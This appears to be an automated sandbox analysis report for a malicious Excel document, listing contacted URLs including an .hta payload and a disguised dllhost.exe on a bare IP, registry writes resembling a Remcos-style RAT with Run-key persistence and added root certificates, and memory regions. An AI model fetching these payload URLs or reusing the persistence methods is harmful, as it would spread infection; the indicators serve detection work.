unknown
|
||
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
https://og1.in/2Rxzb3w
|
unknown
|
||
https://og1.in/2Rxzb3
|
104.21.78.54
|
||
http://go.micros
|
unknown
|
||
https://og1.in/2Rxzb3C
|
unknown
|
||
https://www.google.com
|
unknown
|
||
http://192.3.220.22/xampp/en/cookienetbookinetcahce.htahttp://192.3.220.22/xampp/en/cookienetbookine
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://login.yahoo.com/config/login
|
unknown
|
||
http://192.3.220.22/videro
|
unknown
|
||
http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta9p
|
unknown
|
||
http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaC:
|
unknown
|
||
https://og1.in/2Rxzb3W
|
unknown
|
||
http://www.nirsoft.net/
|
unknown
|
||
http://ocsp.entrust.net0D
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://192.3.220.22/430/dllhost.exe%m
|
unknown
|
||
http://go.cr
|
unknown
|
||
http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaMy
|
unknown
|
||
http://192.3.220.22/430/dllhost.
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://crl.entrust.net/server1.crl0
|
unknown
|
||
https://og1.in/2Rxzb3&
|
unknown
|
||
http://go.microso
|
unknown
|
||
http://www.imvu.com
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
https://og1.in/ket
|
unknown
|
||
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaQ
|
unknown
|
||
http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaP
|
unknown
|
||
https://www.google.com/accounts/servicelogin
|
unknown
|
||
http://192.3.220.22/430/dllhost.exep
|
unknown
|
||
https://secure.comodo.com/CPS0
|
unknown
|
||
http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaF
|
unknown
|
||
http://crl.entrust.net/2048ca.crl0
|
unknown
|
||
http://www.ebuddy.com
|
unknown
|
There are 42 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
og1.in
|
104.21.78.54
|
||
geoplugin.net
|
178.237.33.50
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
192.3.220.22
|
unknown
|
United States
|
||
107.173.4.16
|
unknown
|
United States
|
||
104.21.78.54
|
og1.in
|
United States
|
||
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
172.67.216.244
|
unknown
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
HKEY_CURRENT_USER\Software\Rmc-DSGECX
|
exepath
|
||
HKEY_CURRENT_USER\Software\Rmc-DSGECX
|
licence
|
||
HKEY_CURRENT_USER\Software\Rmc-DSGECX
|
time
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
ew0
|
||
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\28BCB
|
28BCB
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
8~0
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\324FE
|
324FE
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\327FA
|
327FA
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3335F
|
3335F
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Item 1
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 21
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\327FA
|
327FA
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_CURRENT_USER\Hayweed88\Uninstall\Cakiest237\heelers
|
Armgangen
|
||
HKEY_CURRENT_USER\brdbakken\Equableness66\Skvalderen137
|
inoperculate
|
||
HKEY_CURRENT_USER\seers\Uninstall\saleably
|
zaffers
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_CURRENT_USER\Software\Roscoelite
|
Aftvttedes
|
||
HKEY_CURRENT_USER\Environment
|
Misbehavers
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
|
Chivey57
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
There are 77 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
6AA4000
|
heap
|
page read and write
|
||
9B56000
|
direct allocation
|
page execute and read and write
|
||
9888000
|
direct allocation
|
page execute and read and write
|
||
9C8000
|
heap
|
page read and write
|
||
46F000
|
unkown
|
page readonly
|
||
6F0000
|
heap
|
page read and write
|
||
A0DA000
|
direct allocation
|
page execute and read and write
|
||
1F56000
|
heap
|
page read and write
|
||
478000
|
heap
|
page read and write
|
||
350000
|
heap
|
page read and write
|
||
1A986000
|
heap
|
page read and write
|
||
7FE89790000
|
trusted library allocation
|
page execute and read and write
|
||
1ABC5000
|
heap
|
page read and write
|
||
A025000
|
direct allocation
|
page execute and read and write
|
||
57F1000
|
heap
|
page read and write
|
||
3FF000
|
stack
|
page read and write
|
||
12666000
|
trusted library allocation
|
page read and write
|
||
4FD4000
|
heap
|
page read and write
|
||
2116000
|
heap
|
page read and write
|
||
4D3000
|
direct allocation
|
page read and write
|
||
4741000
|
heap
|
page read and write
|
||
568B000
|
heap
|
page read and write
|
||
550000
|
heap
|
page read and write
|
||
4877000
|
heap
|
page read and write
|
||
229F000
|
stack
|
page read and write
|
||
5F00000
|
heap
|
page read and write
|
||
54F1000
|
heap
|
page read and write
|
||
1D10000
|
direct allocation
|
page read and write
|
||
46F000
|
unkown
|
page readonly
|
||
2491000
|
trusted library allocation
|
page read and write
|
||
4A0000
|
direct allocation
|
page read and write
|
||
35D000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
2800000
|
trusted library allocation
|
page read and write
|
||
B7000
|
stack
|
page read and write
|
||
61CF000
|
heap
|
page read and write
|
||
A07D000
|
direct allocation
|
page execute and read and write
|
||
634F000
|
stack
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
167000
|
stack
|
page read and write
|
||
A094000
|
direct allocation
|
page execute and read and write
|
||
4790000
|
heap
|
page read and write
|
||
5654000
|
heap
|
page read and write
|
||
7FE89860000
|
trusted library allocation
|
page read and write
|
||
5D6E000
|
stack
|
page read and write
|
||
63B6000
|
heap
|
page read and write
|
||
5685000
|
heap
|
page read and write
|
||
4BF000
|
heap
|
page read and write
|
||
1C5000
|
trusted library allocation
|
page execute and read and write
|
||
614D000
|
heap
|
page read and write
|
||
20F0000
|
heap
|
page read and write
|
||
53F000
|
heap
|
page read and write
|
||
2300000
|
trusted library allocation
|
page read and write
|
||
394000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
61F2000
|
heap
|
page read and write
|
||
2B71000
|
trusted library allocation
|
page read and write
|
||
49A000
|
heap
|
page read and write
|
||
4794000
|
heap
|
page read and write
|
||
6EC000
|
heap
|
page read and write
|
||
541E000
|
stack
|
page read and write
|
||
307000
|
heap
|
page read and write
|
||
EF0000
|
direct allocation
|
page read and write
|
||
56C0000
|
heap
|
page read and write
|
||
570000
|
heap
|
page read and write
|
||
3414000
|
heap
|
page read and write
|
||
1B820000
|
heap
|
page read and write
|
||
47D000
|
heap
|
page read and write
|
||
9B09000
|
direct allocation
|
page execute and read and write
|
||
400000
|
unkown
|
page readonly
|
||
3E7E000
|
heap
|
page read and write
|
||
3EE0000
|
heap
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
55B3000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
56B7000
|
heap
|
page read and write
|
||
D10000
|
trusted library allocation
|
page read and write
|
||
A04E000
|
direct allocation
|
page execute and read and write
|
||
CF0000
|
trusted library allocation
|
page read and write
|
||
5A5000
|
heap
|
page read and write
|
||
375000
|
heap
|
page read and write
|
||
2370000
|
heap
|
page read and write
|
||
4B6E000
|
stack
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
983000
|
trusted library allocation
|
page read and write
|
||
4707000
|
heap
|
page read and write
|
||
373000
|
heap
|
page read and write
|
||
B10000
|
trusted library allocation
|
page read and write
|
||
21E3000
|
heap
|
page read and write
|
||
A058000
|
direct allocation
|
page execute and read and write
|
||
5C59000
|
heap
|
page read and write
|
||
3E7C000
|
heap
|
page read and write
|
||
2A03000
|
trusted library allocation
|
page read and write
|
||
6688000
|
direct allocation
|
page execute and read and write
|
||
1D0000
|
trusted library allocation
|
page read and write
|
||
56B0000
|
heap
|
page read and write
|
||
2B0000
|
direct allocation
|
page read and write
|
||
DF0000
|
direct allocation
|
page read and write
|
||
6F3000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
5C71000
|
heap
|
page read and write
|
||
230000
|
heap
|
page read and write
|
||
4858000
|
heap
|
page read and write
|
||
5830000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
980000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
DD0000
|
heap
|
page read and write
|
||
2240000
|
heap
|
page read and write
|
||
A09B000
|
direct allocation
|
page execute and read and write
|
||
46BF000
|
heap
|
page read and write
|
||
1ABD9000
|
heap
|
page read and write
|
||
3780000
|
trusted library allocation
|
page read and write
|
||
1E10000
|
heap
|
page read and write
|
||
6E5000
|
heap
|
page read and write
|
||
46FD000
|
heap
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
56B5000
|
heap
|
page read and write
|
||
47AE000
|
stack
|
page read and write
|
||
5FBC000
|
heap
|
page read and write
|
||
A0BD000
|
direct allocation
|
page execute and read and write
|
||
1C31D000
|
heap
|
page read and write
|
||
36E000
|
heap
|
page read and write
|
||
35E000
|
heap
|
page read and write
|
||
586C000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
46B2000
|
heap
|
page read and write
|
||
8D000
|
stack
|
page read and write
|
||
3371000
|
heap
|
page read and write
|
||
E90000
|
trusted library allocation
|
page read and write
|
||
3DC2000
|
heap
|
page read and write
|
||
4F70000
|
heap
|
page read and write
|
||
1F14000
|
heap
|
page read and write
|
||
7FE89910000
|
trusted library allocation
|
page read and write
|
||
49B000
|
heap
|
page read and write
|
||
1AA6C000
|
heap
|
page read and write
|
||
1BF6000
|
heap
|
page read and write
|
||
7FE89686000
|
trusted library allocation
|
page read and write
|
||
514000
|
heap
|
page read and write
|
||
510000
|
heap
|
page read and write
|
||
41F000
|
system
|
page execute and read and write
|
||
4F20000
|
heap
|
page read and write
|
||
557000
|
heap
|
page read and write
|
||
50E000
|
heap
|
page read and write
|
||
28B0000
|
trusted library allocation
|
page read and write
|
||
7FE899F0000
|
trusted library allocation
|
page read and write
|
||
1C5C000
|
heap
|
page read and write
|
||
A054000
|
direct allocation
|
page execute and read and write
|
||
56A2000
|
heap
|
page read and write
|
||
18B000
|
stack
|
page read and write
|
||
3905000
|
trusted library allocation
|
page read and write
|
||
373000
|
heap
|
page read and write
|
||
54AC000
|
stack
|
page read and write
|
||
6FD000
|
heap
|
page read and write
|
||
4B9000
|
heap
|
page read and write
|
||
4A80000
|
heap
|
page read and write
|
||
1DB0000
|
heap
|
page read and write
|
||
579000
|
heap
|
page read and write
|
||
267000
|
heap
|
page read and write
|
||
3417000
|
heap
|
page read and write
|
||
25E0000
|
trusted library allocation
|
page read and write
|
||
2173000
|
heap
|
page read and write
|
||
33DD000
|
heap
|
page read and write
|
||
5BE3000
|
heap
|
page read and write
|
||
4FED000
|
heap
|
page read and write
|
||
FCE000
|
stack
|
page read and write
|
||
48F9000
|
heap
|
page read and write
|
||
593000
|
heap
|
page read and write
|
||
2710000
|
trusted library allocation
|
page read and write
|
||
7FFFFF82000
|
trusted library allocation
|
page readonly
|
||
56EC000
|
heap
|
page read and write
|
||
506000
|
heap
|
page read and write
|
||
7FE897B2000
|
trusted library allocation
|
page read and write
|
||
5F68000
|
stack
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
E28000
|
trusted library allocation
|
page read and write
|
||
594000
|
heap
|
page read and write
|
||
28E0000
|
remote allocation
|
page read and write
|
||
43E000
|
stack
|
page read and write
|
||
574000
|
heap
|
page read and write
|
||
1E62000
|
heap
|
page read and write
|
||
880000
|
heap
|
page read and write
|
||
22E7000
|
heap
|
page read and write
|
||
489E000
|
stack
|
page read and write
|
||
A08A000
|
direct allocation
|
page execute and read and write
|
||
4B10000
|
trusted library allocation
|
page read and write
|
||
1CAD000
|
heap
|
page read and write
|
||
6E9000
|
heap
|
page read and write
|
||
484000
|
heap
|
page read and write
|
||
56C5000
|
heap
|
page read and write
|
||
606D000
|
heap
|
page read and write
|
||
25C000
|
heap
|
page read and write
|
||
39D000
|
heap
|
page read and write
|
||
48FB000
|
heap
|
page read and write
|
||
3404000
|
heap
|
page read and write
|
||
56B5000
|
heap
|
page read and write
|
||
395000
|
heap
|
page read and write
|
||
3E3D000
|
heap
|
page read and write
|
||
3A24000
|
heap
|
page read and write
|
||
451000
|
heap
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
55B5000
|
heap
|
page read and write
|
||
880000
|
direct allocation
|
page read and write
|
||
12511000
|
trusted library allocation
|
page read and write
|
||
3E2A000
|
heap
|
page read and write
|
||
1B16E000
|
stack
|
page read and write
|
||
5B4A000
|
heap
|
page read and write
|
||
2E6000
|
heap
|
page execute and read and write
|
||
57D000
|
heap
|
page read and write
|
||
57F0000
|
heap
|
page read and write
|
||
2590000
|
trusted library allocation
|
page read and write
|
||
57A000
|
heap
|
page read and write
|
||
55E000
|
heap
|
page read and write
|
||
7FE898D0000
|
trusted library allocation
|
page read and write
|
||
341E000
|
heap
|
page read and write
|
||
3DC6000
|
heap
|
page read and write
|
||
803000
|
trusted library allocation
|
page execute and read and write
|
||
34F0000
|
trusted library allocation
|
page read and write
|
||
3479000
|
trusted library allocation
|
page read and write
|
||
2113000
|
heap
|
page read and write
|
||
35E000
|
stack
|
page read and write
|
||
9C0000
|
trusted library allocation
|
page read and write
|
||
232F000
|
stack
|
page read and write
|
||
3F0000
|
direct allocation
|
page read and write
|
||
5B6D000
|
heap
|
page read and write
|
||
56B5000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
47B000
|
heap
|
page read and write
|
||
4C3000
|
heap
|
page read and write
|
||
57F1000
|
heap
|
page read and write
|
||
574000
|
heap
|
page read and write
|
||
60D7000
|
heap
|
page read and write
|
||
63B000
|
heap
|
page read and write
|
||
520E000
|
stack
|
page read and write
|
||
1A70E000
|
heap
|
page execute and read and write
|
||
36B000
|
heap
|
page read and write
|
||
21D6000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
10000
|
heap
|
page read and write
|
||
5D22000
|
heap
|
page read and write
|
||
7FE89900000
|
trusted library allocation
|
page read and write
|
||
364000
|
heap
|
page read and write
|
||
2B1F000
|
stack
|
page read and write
|
||
2B8E000
|
trusted library allocation
|
page read and write
|
||
328E000
|
trusted library allocation
|
page read and write
|
||
173000
|
trusted library allocation
|
page read and write
|
||
7FE897D4000
|
trusted library allocation
|
page read and write
|
||
35D000
|
heap
|
page read and write
|
||
37B000
|
heap
|
page read and write
|
||
3E23000
|
heap
|
page read and write
|
||
1CBD000
|
heap
|
page read and write
|
||
391000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
2CE000
|
stack
|
page read and write
|
||
1DC9000
|
heap
|
page read and write
|
||
5BF000
|
heap
|
page read and write
|
||
4888000
|
heap
|
page read and write
|
||
7FE8B1E6000
|
trusted library allocation
|
page read and write
|
||
3B9000
|
heap
|
page read and write
|
||
1B670000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
4A7C000
|
heap
|
page read and write
|
||
4EDB000
|
stack
|
page read and write
|
||
2118000
|
heap
|
page read and write
|
||
57F1000
|
heap
|
page read and write
|
||
40E000
|
heap
|
page read and write
|
||
7FE897D0000
|
trusted library allocation
|
page read and write
|
||
66C000
|
heap
|
page read and write
|
||
2166000
|
heap
|
page read and write
|
||
4FD000
|
heap
|
page read and write
|
||
400000
|
heap
|
page read and write
|
||
1C250000
|
heap
|
page read and write
|
||
9C0000
|
heap
|
page read and write
|
||
7FE8962C000
|
trusted library allocation
|
page execute and read and write
|
||
60CE000
|
stack
|
page read and write | page guard
|
||
6194000
|
heap
|
page read and write
|
||
5AF7000
|
heap
|
page read and write
|
||
8D000
|
stack
|
page read and write
|
||
5C07000
|
heap
|
page read and write
|
||
2519000
|
trusted library allocation
|
page read and write
|
||
37A000
|
heap
|
page read and write
|
||
5B32000
|
heap
|
page read and write
|
||
4859000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
30F000
|
stack
|
page read and write
|
||
21E4000
|
heap
|
page read and write
|
||
36E000
|
stack
|
page read and write
|
||
569D000
|
heap
|
page read and write
|
||
3EE000
|
heap
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
2368000
|
heap
|
page read and write
|
||
3DC2000
|
heap
|
page read and write
|
||
6F5000
|
heap
|
page read and write
|
||
A05A000
|
direct allocation
|
page execute and read and write
|
||
3E48000
|
heap
|
page read and write
|
||
44B000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
17F000
|
trusted library allocation
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
578000
|
heap
|
page read and write
|
||
561A000
|
heap
|
page read and write
|
||
3C70000
|
trusted library allocation
|
page read and write
|
||
7FFFFF80000
|
trusted library allocation
|
page readonly
|
||
5CA0000
|
heap
|
page read and write
|
||
2D7000
|
heap
|
page read and write
|
||
4BC000
|
heap
|
page read and write
|
||
1F10000
|
heap
|
page read and write
|
||
46F000
|
unkown
|
page readonly
|
||
5548000
|
heap
|
page read and write
|
||
A122000
|
direct allocation
|
page execute and read and write
|
||
3B3B000
|
stack
|
page read and write
|
||
579000
|
heap
|
page read and write
|
||
3AAD000
|
trusted library allocation
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
27C0000
|
heap
|
page read and write
|
||
970000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
7FFFFF82000
|
trusted library allocation
|
page readonly
|
||
3C7000
|
heap
|
page read and write
|
||
3969000
|
trusted library allocation
|
page read and write
|
||
3CE000
|
heap
|
page read and write
|
||
2D7000
|
trusted library allocation
|
page read and write
|
||
1E50000
|
direct allocation
|
page read and write
|
||
43A000
|
heap
|
page read and write
|
||
7FE8994D000
|
trusted library allocation
|
page read and write
|
||
671000
|
heap
|
page read and write
|
||
7FE8B190000
|
trusted library allocation
|
page read and write
|
||
3F9000
|
heap
|
page read and write
|
||
88C000
|
heap
|
page read and write
|
||
300000
|
trusted library allocation
|
page read and write
|
||
575000
|
heap
|
page read and write
|
||
6DD000
|
heap
|
page read and write
|
||
7FE89913000
|
trusted library allocation
|
page read and write
|
||
436000
|
heap
|
page read and write
|
||
4DAD000
|
heap
|
page read and write
|
||
46F000
|
unkown
|
page readonly
|
||
35A0000
|
trusted library allocation
|
page read and write
|
||
240000
|
direct allocation
|
page read and write
|
||
56A1000
|
heap
|
page read and write
|
||
8D0000
|
trusted library allocation
|
page read and write
|
||
6BC000
|
heap
|
page read and write
|
||
1AE69000
|
stack
|
page read and write
|
||
3CD0000
|
trusted library allocation
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
4A00000
|
trusted library allocation
|
page read and write
|
||
579000
|
heap
|
page read and write
|
||
222000
|
stack
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
45D000
|
system
|
page execute and read and write
|
||
58B6000
|
heap
|
page read and write
|
||
3E0000
|
heap
|
page read and write
|
||
3A8000
|
stack
|
page read and write
|
||
478C000
|
heap
|
page read and write
|
||
33F1000
|
heap
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
9FF5000
|
direct allocation
|
page execute and read and write
|
||
24E0000
|
trusted library allocation
|
page execute read
|
||
20000
|
heap
|
page read and write
|
||
682000
|
heap
|
page read and write
|
||
7FE898B0000
|
trusted library allocation
|
page read and write
|
||
3412000
|
heap
|
page read and write
|
||
4A5E000
|
stack
|
page read and write
|
||
410000
|
direct allocation
|
page read and write
|
||
7FE8AE90000
|
trusted library allocation
|
page read and write
|
||
5CE000
|
heap
|
page read and write
|
||
5656000
|
heap
|
page read and write
|
||
1C7EC000
|
stack
|
page read and write
|
||
4F02000
|
heap
|
page read and write
|
||
220000
|
heap
|
page read and write
|
||
4742000
|
heap
|
page read and write
|
||
459000
|
system
|
page execute and read and write
|
||
33F6000
|
heap
|
page read and write
|
||
3356000
|
heap
|
page read and write
|
||
3E3B000
|
heap
|
page read and write
|
||
341B000
|
heap
|
page read and write
|
||
379000
|
heap
|
page read and write
|
||
2179000
|
heap
|
page read and write
|
||
375000
|
heap
|
page read and write
|
||
56AD000
|
heap
|
page read and write
|
||
18E000
|
stack
|
page read and write
|
||
4FCC000
|
heap
|
page read and write
|
||
21CC1000
|
heap
|
page read and write
|
||
A0C1000
|
direct allocation
|
page execute and read and write
|
||
EA0000
|
trusted library allocation
|
page execute and read and write
|
||
2451000
|
trusted library allocation
|
page read and write
|
||
960000
|
heap
|
page read and write
|
||
7FE8AF26000
|
trusted library allocation
|
page read and write
|
||
48D2000
|
heap
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
580000
